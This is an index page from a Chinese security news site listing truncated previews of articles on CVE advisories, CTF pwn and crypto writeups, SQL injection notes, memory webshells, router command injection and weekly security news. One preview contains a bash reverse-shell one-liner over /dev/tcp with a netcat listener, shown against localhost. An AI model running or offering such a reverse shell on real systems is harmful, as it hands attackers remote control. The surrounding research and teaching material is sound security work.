ZONE.CI 全球网

一、洞态IAST
洞态IAST是一款被动式的交互式安全测试工具，具有漏洞检出率高、误报率低、无脏数据、支持数据包加密/一次性签名/验证码等不支持重放的场景下的漏

背景：
“内存马”也被称为“无文件马”，顾名思义是一种仅存在于内存中的无文件恶意代码。
近年来，随着攻防演练范围不断扩大，攻防技术水平不断加强，专业的监测、防护

0x01   漏洞简述
2021年04月02日，360CERT监测发现VMware发布了VMSA-2021-0005的风险通告，漏洞编号为CVE-2021-21

简介
在高版本的glibc中安全机制也比较完善，就算我们找到漏洞，构造出堆块重叠，也常常难以得到任意读写的方法。在VNCTF2021的比赛中LittleRead

0x1基本概念0x1.1分组密码
分组密码又称为分块加密或块加密，是一种对称加密算法，这类算法将明文分成多个等长的组，使用确定的算法和对称秘钥对每组分别加密或解

很久之前就想总结一篇SQL注入及其更深一层的渗透方面的笔记了，奈何一是下不了决心，二是（好吧，还是下不了决心）今天无意之间翻找出自己之前学习做的笔记，决定重新整

2021 MAR DASCTF题解，包括一道套路pwn题和一道2.32 uaf的pwn题，两个reverse 和 四道密码学。题目考察知识点比较新，也能够从中学

在渗透测试的端口扫描阶段，相信很多人遇到的问题是nmap太慢，masscan不准确。 所谓工欲善其事，必先利其器，TXPortMap为天象渗透测试平台后端使用的

0x0 前言
D-Link DIR-816 A2是中国台湾友讯（D-Link）公司的一款无线路由器。攻击者可借助‘datetime’参数中的shell元字符利用

活动简介
BCTF 秉持着推动自动化漏洞挖掘和利用工具的发展这一初衷，通过解题数据视角分析机器与人类的各自优势，探索自动化攻防领域的技术进展，努力打造了解AI安

Windows发展历史
Microsoft Windows,是美国微软公司研发的一套操作系统，它问世于1985年，起初仅仅是DOS模拟环境，后续的系统版本由于微

漏洞 VulnerabilityVMware Carbon Black Workload发布安全通告修复严重漏洞
https://www.vmware.com/

介绍
bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 #TCPListener:
nc -nvlp 1234目标机执行后的结果

论文简介
标题：Order Matters: Semantic-Aware Neural Networks for Binary Code Similarity

最近看到关于angr这一框架的分析,但对于某些部分讲的比较模糊,于是就根据个人理解重新写入一篇分析,如果有理解错误的地方,希望大家指正.
在project模块中

0x00 前言
之前的文章分析了Dubbo的一个反序列化漏洞-CVE-2019-17564，这次来分析一下另外一个dubbo的漏洞-CVE-2020-1948，

前言
这个漏洞真的是被微软坑了，虽然即使微软认了也没多少钱，但是这么一搞钱也没了，CVE也没了。什么原因造成的？具体是因为之前我们提交了一个报告，没有给他具体的

第76期你好呀~欢迎来到“安全头条”！如果你是第一次光顾，可以先阅读站内公告了解我们哦。
【安全头条公告】
安全头条主要发布时下最火热最新鲜的网安资讯，不同于正

首先，minifilter有!fltkd.的命令，ndis有!ndiskd.的命令，但是WFP却没有类似的命令。
尽管有netsh wfp的命令和类似的接口/A

漏洞提交地点：https://coremail.butian.net/
恶意附件样本转发邮箱：[email protected]活动简介
2020年4月2

漏洞 VulnerabilityUbuntu修复多个Linux kernel漏洞
https://ubuntu.com/security/notices/USN

2019年有幸作为外部专家参加了郭威组织的安全防守方案评估，犹记深夜热火朝天讨论台账和措施去留权衡，非常难忘。除了完整的技术方案外，郭威的实践更是完美的动员组织

前言
这两题一题是由Balsn战队举办的比赛中出现的，另一题则是在钓鱼城杯中利用相似的原理出的。总的来说是非常的有趣，最近抽出了一段时间好好感受了一下题目。
首

安全研究者展示了一种新型的 PDF 攻击方式：攻击者可以绕过现有的 PDF 安全策略，在确保数字签名有效的情况下，修改 PDF 文件的内容。这破坏了已签名 PD

0x01   事件导览
本周收录安全热点11项，话题集中在数据泄露、网络攻击方面，涉及的组织有：Asteelflash、Facebook、PHP SRC、Act